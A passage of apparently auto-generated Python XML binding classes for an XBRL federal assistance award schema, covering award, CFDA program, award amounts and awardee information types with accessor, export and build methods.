    def set_parentAwardID(self, parentAwardID): self.parentAwardID = parentAwardID
    def get_modificationAmendmentNumber(self): return self.modificationAmendmentNumber
    def set_modificationAmendmentNumber(self, modificationAmendmentNumber): self.modificationAmendmentNumber = modificationAmendmentNumber
    def get_recordType(self): return self.recordType
    def set_recordType(self, recordType): self.recordType = recordType
    def get_typeOfAction(self): return self.typeOfAction
    def set_typeOfAction(self, typeOfAction): self.typeOfAction = typeOfAction
    def get_typeOfTransactionCode(self): return self.typeOfTransactionCode
    def set_typeOfTransactionCode(self, typeOfTransactionCode): self.typeOfTransactionCode = typeOfTransactionCode
    def get_awardeeInformation(self): return self.awardeeInformation
    def set_awardeeInformation(self, awardeeInformation): self.awardeeInformation = awardeeInformation
    def get_primaryPlaceOfPerformance(self): return self.primaryPlaceOfPerformance
    def set_primaryPlaceOfPerformance(self, primaryPlaceOfPerformance): self.primaryPlaceOfPerformance = primaryPlaceOfPerformance
    def get_periodOfPerformance(self): return self.periodOfPerformance
    def set_periodOfPerformance(self, periodOfPerformance): self.periodOfPerformance = periodOfPerformance
    def get_awardingAgency(self): return self.awardingAgency
    def set_awardingAgency(self, awardingAgency): self.awardingAgency = awardingAgency
    def add_awardingAgency(self, value): self.awardingAgency.append(value)
    def insert_awardingAgency_at(self, index, value): self.awardingAgency.insert(index, value)
    def replace_awardingAgency_at(self, index, value): self.awardingAgency[index] = value
    def get_fundingAgency(self): return self.fundingAgency
    def set_fundingAgency(self, fundingAgency): self.fundingAgency = fundingAgency
    def add_fundingAgency(self, value): self.fundingAgency.append(value)
    def insert_fundingAgency_at(self, index, value): self.fundingAgency.insert(index, value)
    def replace_fundingAgency_at(self, index, value): self.fundingAgency[index] = value
    def get_awardingSubTierAgency(self): return self.awardingSubTierAgency
    def set_awardingSubTierAgency(self, awardingSubTierAgency): self.awardingSubTierAgency = awardingSubTierAgency
    def add_awardingSubTierAgency(self, value): self.awardingSubTierAgency.append(value)
    def insert_awardingSubTierAgency_at(self, index, value): self.awardingSubTierAgency.insert(index, value)
    def replace_awardingSubTierAgency_at(self, index, value): self.awardingSubTierAgency[index] = value
    def get_fundingSubTierAgency(self): return self.fundingSubTierAgency
    def set_fundingSubTierAgency(self, fundingSubTierAgency): self.fundingSubTierAgency = fundingSubTierAgency
    def add_fundingSubTierAgency(self, value): self.fundingSubTierAgency.append(value)
    def insert_fundingSubTierAgency_at(self, index, value): self.fundingSubTierAgency.insert(index, value)
    def replace_fundingSubTierAgency_at(self, index, value): self.fundingSubTierAgency[index] = value
    def get_highlyCompensatedOfficer(self): return self.highlyCompensatedOfficer
    def set_highlyCompensatedOfficer(self, highlyCompensatedOfficer): self.highlyCompensatedOfficer = highlyCompensatedOfficer
    def add_highlyCompensatedOfficer(self, value): self.highlyCompensatedOfficer.append(value)
    def insert_highlyCompensatedOfficer_at(self, index, value): self.highlyCompensatedOfficer.insert(index, value)
    def replace_highlyCompensatedOfficer_at(self, index, value): self.highlyCompensatedOfficer[index] = value
    def get_catalogOfFederalDomesticAssistanceProgram(self): return self.catalogOfFederalDomesticAssistanceProgram
    def set_catalogOfFederalDomesticAssistanceProgram(self, catalogOfFederalDomesticAssistanceProgram): self.catalogOfFederalDomesticAssistanceProgram = catalogOfFederalDomesticAssistanceProgram
    def get_awardAmounts(self): return self.awardAmounts
    def set_awardAmounts(self, awardAmounts): self.awardAmounts = awardAmounts
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def hasContent_(self):
        """Return True if any child element is set (non-None scalar or
        non-empty repeating list); used by export() to decide between a
        self-closing tag and a full open/close element."""
        if (
            self.awardDescription is not None or
            self.awardID is not None or
            self.parentAwardID is not None or
            self.modificationAmendmentNumber is not None or
            self.recordType is not None or
            self.typeOfAction is not None or
            self.typeOfTransactionCode is not None or
            self.awardeeInformation is not None or
            self.primaryPlaceOfPerformance is not None or
            self.periodOfPerformance is not None or
            self.awardingAgency or
            self.fundingAgency or
            self.awardingSubTierAgency or
            self.fundingSubTierAgency or
            self.highlyCompensatedOfficer or
            self.catalogOfFederalDomesticAssistanceProgram is not None or
            self.awardAmounts is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='awardComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
        """Write this object to *outfile* as an XML element at indent
        *level*; emits a self-closing tag when there is no content."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # An object built from XML keeps the tag it was parsed from.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='awardComplexType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='awardComplexType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='awardComplexType'):
        """Write the ``id`` attribute, if set and not already emitted."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            # NOTE(review): quote_attrib(...).encode(ExternalEncoding) is
            # Python-2-style; under Python 3 this would embed a bytes
            # repr — confirm the target runtime.
            outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='awardComplexType', fromsubclass_=False, pretty_print=True):
        """Write every populated child element; each child carries its own
        namespace prefix (award:, gen:, or finassist:)."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.awardDescription is not None:
            self.awardDescription.export(outfile, level, namespace_='award:', name_='awardDescription', pretty_print=pretty_print)
        if self.awardID is not None:
            self.awardID.export(outfile, level, namespace_='gen:', name_='awardID', pretty_print=pretty_print)
        if self.parentAwardID is not None:
            self.parentAwardID.export(outfile, level, namespace_='award:', name_='parentAwardID', pretty_print=pretty_print)
        if self.modificationAmendmentNumber is not None:
            self.modificationAmendmentNumber.export(outfile, level, namespace_='award:', name_='modificationAmendmentNumber', pretty_print=pretty_print)
        if self.recordType is not None:
            self.recordType.export(outfile, level, namespace_='award:', name_='recordType', pretty_print=pretty_print)
        if self.typeOfAction is not None:
            self.typeOfAction.export(outfile, level, namespace_='award:', name_='typeOfAction', pretty_print=pretty_print)
        if self.typeOfTransactionCode is not None:
            self.typeOfTransactionCode.export(outfile, level, namespace_='award:', name_='typeOfTransactionCode', pretty_print=pretty_print)
        if self.awardeeInformation is not None:
            self.awardeeInformation.export(outfile, level, namespace_='finassist:', name_='awardeeInformation', pretty_print=pretty_print)
        if self.primaryPlaceOfPerformance is not None:
            self.primaryPlaceOfPerformance.export(outfile, level, namespace_='award:', name_='primaryPlaceOfPerformance', pretty_print=pretty_print)
        if self.periodOfPerformance is not None:
            self.periodOfPerformance.export(outfile, level, namespace_='finassist:', name_='periodOfPerformance', pretty_print=pretty_print)
        for awardingAgency_ in self.awardingAgency:
            awardingAgency_.export(outfile, level, namespace_='award:', name_='awardingAgency', pretty_print=pretty_print)
        for fundingAgency_ in self.fundingAgency:
            fundingAgency_.export(outfile, level, namespace_='award:', name_='fundingAgency', pretty_print=pretty_print)
        for awardingSubTierAgency_ in self.awardingSubTierAgency:
            awardingSubTierAgency_.export(outfile, level, namespace_='award:', name_='awardingSubTierAgency', pretty_print=pretty_print)
        for fundingSubTierAgency_ in self.fundingSubTierAgency:
            fundingSubTierAgency_.export(outfile, level, namespace_='award:', name_='fundingSubTierAgency', pretty_print=pretty_print)
        for highlyCompensatedOfficer_ in self.highlyCompensatedOfficer:
            highlyCompensatedOfficer_.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficer', pretty_print=pretty_print)
        if self.catalogOfFederalDomesticAssistanceProgram is not None:
            self.catalogOfFederalDomesticAssistanceProgram.export(outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgram', pretty_print=pretty_print)
        if self.awardAmounts is not None:
            self.awardAmounts.export(outfile, level, namespace_='finassist:', name_='awardAmounts', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an etree *node* (attributes, then each
        child element); returns self to allow chaining."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip any namespace prefix from the child tag.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the ``id`` attribute from *node*, if present."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one child etree node by tag name: build the matching
        member object and assign it (or append it, for repeating
        members), recording the original tag name on the child."""
        if nodeName_ == 'awardDescription':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.awardDescription = obj_
            obj_.original_tagname_ = 'awardDescription'
        elif nodeName_ == 'awardID':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.awardID = obj_
            obj_.original_tagname_ = 'awardID'
        elif nodeName_ == 'parentAwardID':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.parentAwardID = obj_
            obj_.original_tagname_ = 'parentAwardID'
        elif nodeName_ == 'modificationAmendmentNumber':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.modificationAmendmentNumber = obj_
            obj_.original_tagname_ = 'modificationAmendmentNumber'
        elif nodeName_ == 'recordType':
            obj_ = recordTypeItemType.factory()
            obj_.build(child_)
            self.recordType = obj_
            obj_.original_tagname_ = 'recordType'
        elif nodeName_ == 'typeOfAction':
            obj_ = typeOfActionItemType.factory()
            obj_.build(child_)
            self.typeOfAction = obj_
            obj_.original_tagname_ = 'typeOfAction'
        elif nodeName_ == 'typeOfTransactionCode':
            obj_ = typeOfTransactionCodeItemType.factory()
            obj_.build(child_)
            self.typeOfTransactionCode = obj_
            obj_.original_tagname_ = 'typeOfTransactionCode'
        elif nodeName_ == 'awardeeInformation':
            obj_ = awardeeInformationComplexType.factory()
            obj_.build(child_)
            self.awardeeInformation = obj_
            obj_.original_tagname_ = 'awardeeInformation'
        elif nodeName_ == 'primaryPlaceOfPerformance':
            obj_ = addressComplexType.factory()
            obj_.build(child_)
            self.primaryPlaceOfPerformance = obj_
            obj_.original_tagname_ = 'primaryPlaceOfPerformance'
        elif nodeName_ == 'periodOfPerformance':
            obj_ = periodOfPerformanceComplexType.factory()
            obj_.build(child_)
            self.periodOfPerformance = obj_
            obj_.original_tagname_ = 'periodOfPerformance'
        elif nodeName_ == 'awardingAgency':
            obj_ = agencyComplexType.factory()
            obj_.build(child_)
            self.awardingAgency.append(obj_)
            obj_.original_tagname_ = 'awardingAgency'
        elif nodeName_ == 'fundingAgency':
            obj_ = agencyComplexType.factory()
            obj_.build(child_)
            self.fundingAgency.append(obj_)
            obj_.original_tagname_ = 'fundingAgency'
        elif nodeName_ == 'awardingSubTierAgency':
            obj_ = agencyComplexType.factory()
            obj_.build(child_)
            self.awardingSubTierAgency.append(obj_)
            obj_.original_tagname_ = 'awardingSubTierAgency'
        elif nodeName_ == 'fundingSubTierAgency':
            obj_ = agencyComplexType.factory()
            obj_.build(child_)
            self.fundingSubTierAgency.append(obj_)
            obj_.original_tagname_ = 'fundingSubTierAgency'
        elif nodeName_ == 'highlyCompensatedOfficer':
            obj_ = highlyCompensatedOfficerComplexType.factory()
            obj_.build(child_)
            self.highlyCompensatedOfficer.append(obj_)
            obj_.original_tagname_ = 'highlyCompensatedOfficer'
        elif nodeName_ == 'catalogOfFederalDomesticAssistanceProgram':
            obj_ = catalogOfFederalDomesticAssistanceProgramComplexType.factory()
            obj_.build(child_)
            self.catalogOfFederalDomesticAssistanceProgram = obj_
            obj_.original_tagname_ = 'catalogOfFederalDomesticAssistanceProgram'
        elif nodeName_ == 'awardAmounts':
            obj_ = awardAmountsComplexType.factory()
            obj_.build(child_)
            self.awardAmounts = obj_
            obj_.original_tagname_ = 'awardAmounts'
# end class awardComplexType
class catalogOfFederalDomesticAssistanceProgramComplexType(GeneratedsSuper):
    """Generated binding for the schema complex type holding a CFDA
    (Catalog of Federal Domestic Assistance) program reference: a title
    and a number, plus an optional ``id`` attribute."""
    # ``subclass`` lets an application override which class factory() builds.
    subclass = None
    superclass = None
    def __init__(self, id=None, catalogOfFederalDomesticAssistanceTitle=None, catalogOfFederalDomesticAssistanceNumber=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.catalogOfFederalDomesticAssistanceTitle = catalogOfFederalDomesticAssistanceTitle
        self.catalogOfFederalDomesticAssistanceNumber = catalogOfFederalDomesticAssistanceNumber
    def factory(*args_, **kwargs_):
        """Build an instance, honoring a registered ``subclass`` override."""
        if catalogOfFederalDomesticAssistanceProgramComplexType.subclass:
            return catalogOfFederalDomesticAssistanceProgramComplexType.subclass(*args_, **kwargs_)
        else:
            return catalogOfFederalDomesticAssistanceProgramComplexType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated getter/setter accessors.
    def get_catalogOfFederalDomesticAssistanceTitle(self): return self.catalogOfFederalDomesticAssistanceTitle
    def set_catalogOfFederalDomesticAssistanceTitle(self, catalogOfFederalDomesticAssistanceTitle): self.catalogOfFederalDomesticAssistanceTitle = catalogOfFederalDomesticAssistanceTitle
    def get_catalogOfFederalDomesticAssistanceNumber(self): return self.catalogOfFederalDomesticAssistanceNumber
    def set_catalogOfFederalDomesticAssistanceNumber(self, catalogOfFederalDomesticAssistanceNumber): self.catalogOfFederalDomesticAssistanceNumber = catalogOfFederalDomesticAssistanceNumber
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def hasContent_(self):
        """Return True if either child element is set; drives the
        self-closing-tag decision in export()."""
        if (
            self.catalogOfFederalDomesticAssistanceTitle is not None or
            self.catalogOfFederalDomesticAssistanceNumber is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgramComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this object to *outfile* as an XML element at indent
        *level*; emits a self-closing tag when there is no content."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # An object built from XML keeps the tag it was parsed from.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='catalogOfFederalDomesticAssistanceProgramComplexType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgramComplexType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgramComplexType'):
        """Write the ``id`` attribute, if set and not already emitted."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            # NOTE(review): .encode(ExternalEncoding) is Python-2-style;
            # under Python 3 this would embed a bytes repr — confirm runtime.
            outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceProgramComplexType', fromsubclass_=False, pretty_print=True):
        """Write each populated child element (title, number)."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.catalogOfFederalDomesticAssistanceTitle is not None:
            self.catalogOfFederalDomesticAssistanceTitle.export(outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceTitle', pretty_print=pretty_print)
        if self.catalogOfFederalDomesticAssistanceNumber is not None:
            self.catalogOfFederalDomesticAssistanceNumber.export(outfile, level, namespace_='finassist:', name_='catalogOfFederalDomesticAssistanceNumber', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an etree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip any namespace prefix from the child tag.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the ``id`` attribute from *node*, if present."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one child etree node by tag name to the matching
        member, recording the original tag name on the child."""
        if nodeName_ == 'catalogOfFederalDomesticAssistanceTitle':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.catalogOfFederalDomesticAssistanceTitle = obj_
            obj_.original_tagname_ = 'catalogOfFederalDomesticAssistanceTitle'
        elif nodeName_ == 'catalogOfFederalDomesticAssistanceNumber':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.catalogOfFederalDomesticAssistanceNumber = obj_
            obj_.original_tagname_ = 'catalogOfFederalDomesticAssistanceNumber'
# end class catalogOfFederalDomesticAssistanceProgramComplexType
class awardAmountsComplexType(GeneratedsSuper):
    """Generated binding for the schema complex type holding award funding
    amounts (federal, total, non-federal) plus an optional ``id``
    attribute."""
    # ``subclass`` lets an application override which class factory() builds.
    subclass = None
    superclass = None
    def __init__(self, id=None, federalFundingAmount=None, totalFundingAmount=None, nonFederalFundingAmount=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.federalFundingAmount = federalFundingAmount
        self.totalFundingAmount = totalFundingAmount
        self.nonFederalFundingAmount = nonFederalFundingAmount
    def factory(*args_, **kwargs_):
        """Build an instance, honoring a registered ``subclass`` override."""
        if awardAmountsComplexType.subclass:
            return awardAmountsComplexType.subclass(*args_, **kwargs_)
        else:
            return awardAmountsComplexType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated getter/setter accessors.
    def get_federalFundingAmount(self): return self.federalFundingAmount
    def set_federalFundingAmount(self, federalFundingAmount): self.federalFundingAmount = federalFundingAmount
    def get_totalFundingAmount(self): return self.totalFundingAmount
    def set_totalFundingAmount(self, totalFundingAmount): self.totalFundingAmount = totalFundingAmount
    def get_nonFederalFundingAmount(self): return self.nonFederalFundingAmount
    def set_nonFederalFundingAmount(self, nonFederalFundingAmount): self.nonFederalFundingAmount = nonFederalFundingAmount
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def hasContent_(self):
        """Return True if any amount child is set; drives the
        self-closing-tag decision in export()."""
        if (
            self.federalFundingAmount is not None or
            self.totalFundingAmount is not None or
            self.nonFederalFundingAmount is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='awardAmountsComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" ', pretty_print=True):
        """Write this object to *outfile* as an XML element at indent
        *level*; emits a self-closing tag when there is no content."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # An object built from XML keeps the tag it was parsed from.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='awardAmountsComplexType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='awardAmountsComplexType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='awardAmountsComplexType'):
        """Write the ``id`` attribute, if set and not already emitted."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            # NOTE(review): .encode(ExternalEncoding) is Python-2-style;
            # under Python 3 this would embed a bytes repr — confirm runtime.
            outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='awardAmountsComplexType', fromsubclass_=False, pretty_print=True):
        """Write each populated amount child; note federalFundingAmount
        uses the award: prefix while the others use finassist:."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.federalFundingAmount is not None:
            self.federalFundingAmount.export(outfile, level, namespace_='award:', name_='federalFundingAmount', pretty_print=pretty_print)
        if self.totalFundingAmount is not None:
            self.totalFundingAmount.export(outfile, level, namespace_='finassist:', name_='totalFundingAmount', pretty_print=pretty_print)
        if self.nonFederalFundingAmount is not None:
            self.nonFederalFundingAmount.export(outfile, level, namespace_='finassist:', name_='nonFederalFundingAmount', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an etree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip any namespace prefix from the child tag.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the ``id`` attribute from *node*, if present."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one child etree node by tag name to the matching
        amount member, recording the original tag name on the child."""
        if nodeName_ == 'federalFundingAmount':
            obj_ = amountItemType.factory()
            obj_.build(child_)
            self.federalFundingAmount = obj_
            obj_.original_tagname_ = 'federalFundingAmount'
        elif nodeName_ == 'totalFundingAmount':
            obj_ = amountItemType.factory()
            obj_.build(child_)
            self.totalFundingAmount = obj_
            obj_.original_tagname_ = 'totalFundingAmount'
        elif nodeName_ == 'nonFederalFundingAmount':
            obj_ = amountItemType.factory()
            obj_.build(child_)
            self.nonFederalFundingAmount = obj_
            obj_.original_tagname_ = 'nonFederalFundingAmount'
# end class awardAmountsComplexType
class awardeeInformationComplexType(GeneratedsSuper):
    """Generated binding for the schema complex type describing the
    awardee: business type, legal names, unique identifiers (and parent
    identifiers), and address, plus an optional ``id`` attribute."""
    # ``subclass`` lets an application override which class factory() builds.
    subclass = None
    superclass = None
    def __init__(self, id=None, businessType=None, awardeeLegalBusinessName=None, ultimateParentUniqueIdentifier=None, awardeeUniqueIdentifier=None, awardeeUniqueIdentifierSupplemental=None, ultimateParentLegalBusinessName=None, awardeeAddress=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.businessType = businessType
        self.awardeeLegalBusinessName = awardeeLegalBusinessName
        self.ultimateParentUniqueIdentifier = ultimateParentUniqueIdentifier
        self.awardeeUniqueIdentifier = awardeeUniqueIdentifier
        self.awardeeUniqueIdentifierSupplemental = awardeeUniqueIdentifierSupplemental
        self.ultimateParentLegalBusinessName = ultimateParentLegalBusinessName
        self.awardeeAddress = awardeeAddress
    def factory(*args_, **kwargs_):
        """Build an instance, honoring a registered ``subclass`` override."""
        if awardeeInformationComplexType.subclass:
            return awardeeInformationComplexType.subclass(*args_, **kwargs_)
        else:
            return awardeeInformationComplexType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated getter/setter accessors.
    def get_businessType(self): return self.businessType
    def set_businessType(self, businessType): self.businessType = businessType
    def get_awardeeLegalBusinessName(self): return self.awardeeLegalBusinessName
    def set_awardeeLegalBusinessName(self, awardeeLegalBusinessName): self.awardeeLegalBusinessName = awardeeLegalBusinessName
    def get_ultimateParentUniqueIdentifier(self): return self.ultimateParentUniqueIdentifier
    def set_ultimateParentUniqueIdentifier(self, ultimateParentUniqueIdentifier): self.ultimateParentUniqueIdentifier = ultimateParentUniqueIdentifier
    def get_awardeeUniqueIdentifier(self): return self.awardeeUniqueIdentifier
    def set_awardeeUniqueIdentifier(self, awardeeUniqueIdentifier): self.awardeeUniqueIdentifier = awardeeUniqueIdentifier
    def get_awardeeUniqueIdentifierSupplemental(self): return self.awardeeUniqueIdentifierSupplemental
    def set_awardeeUniqueIdentifierSupplemental(self, awardeeUniqueIdentifierSupplemental): self.awardeeUniqueIdentifierSupplemental = awardeeUniqueIdentifierSupplemental
    def get_ultimateParentLegalBusinessName(self): return self.ultimateParentLegalBusinessName
    def set_ultimateParentLegalBusinessName(self, ultimateParentLegalBusinessName): self.ultimateParentLegalBusinessName = ultimateParentLegalBusinessName
    def get_awardeeAddress(self): return self.awardeeAddress
    def set_awardeeAddress(self, awardeeAddress): self.awardeeAddress = awardeeAddress
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def hasContent_(self):
        """Return True if any child element is set; drives the
        self-closing-tag decision in export()."""
        if (
            self.businessType is not None or
            self.awardeeLegalBusinessName is not None or
            self.ultimateParentUniqueIdentifier is not None or
            self.awardeeUniqueIdentifier is not None or
            self.awardeeUniqueIdentifierSupplemental is not None or
            self.ultimateParentLegalBusinessName is not None or
            self.awardeeAddress is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='awardeeInformationComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" ', pretty_print=True):
        """Write this object to *outfile* as an XML element at indent
        *level*; emits a self-closing tag when there is no content."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # An object built from XML keeps the tag it was parsed from.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='awardeeInformationComplexType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='awardeeInformationComplexType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='awardeeInformationComplexType'):
        """Write the ``id`` attribute, if set and not already emitted."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            # NOTE(review): .encode(ExternalEncoding) is Python-2-style;
            # under Python 3 this would embed a bytes repr — confirm runtime.
            outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='awardeeInformationComplexType', fromsubclass_=False, pretty_print=True):
        """Write each populated child element; all children use the
        award: namespace prefix."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.businessType is not None:
            self.businessType.export(outfile, level, namespace_='award:', name_='businessType', pretty_print=pretty_print)
        if self.awardeeLegalBusinessName is not None:
            self.awardeeLegalBusinessName.export(outfile, level, namespace_='award:', name_='awardeeLegalBusinessName', pretty_print=pretty_print)
        if self.ultimateParentUniqueIdentifier is not None:
            self.ultimateParentUniqueIdentifier.export(outfile, level, namespace_='award:', name_='ultimateParentUniqueIdentifier', pretty_print=pretty_print)
        if self.awardeeUniqueIdentifier is not None:
            self.awardeeUniqueIdentifier.export(outfile, level, namespace_='award:', name_='awardeeUniqueIdentifier', pretty_print=pretty_print)
        if self.awardeeUniqueIdentifierSupplemental is not None:
            self.awardeeUniqueIdentifierSupplemental.export(outfile, level, namespace_='award:', name_='awardeeUniqueIdentifierSupplemental', pretty_print=pretty_print)
        if self.ultimateParentLegalBusinessName is not None:
            self.ultimateParentLegalBusinessName.export(outfile, level, namespace_='award:', name_='ultimateParentLegalBusinessName', pretty_print=pretty_print)
        if self.awardeeAddress is not None:
            self.awardeeAddress.export(outfile, level, namespace_='award:', name_='awardeeAddress', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an etree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip any namespace prefix from the child tag.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the ``id`` attribute from *node*, if present."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one child etree node by tag name to the matching
        member, recording the original tag name on the child."""
        if nodeName_ == 'businessType':
            obj_ = businessTypeItemType.factory()
            obj_.build(child_)
            self.businessType = obj_
            obj_.original_tagname_ = 'businessType'
        elif nodeName_ == 'awardeeLegalBusinessName':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.awardeeLegalBusinessName = obj_
            obj_.original_tagname_ = 'awardeeLegalBusinessName'
        elif nodeName_ == 'ultimateParentUniqueIdentifier':
            obj_ = integerItemType.factory()
            obj_.build(child_)
            self.ultimateParentUniqueIdentifier = obj_
            obj_.original_tagname_ = 'ultimateParentUniqueIdentifier'
        elif nodeName_ == 'awardeeUniqueIdentifier':
            obj_ = integerItemType.factory()
            obj_.build(child_)
            self.awardeeUniqueIdentifier = obj_
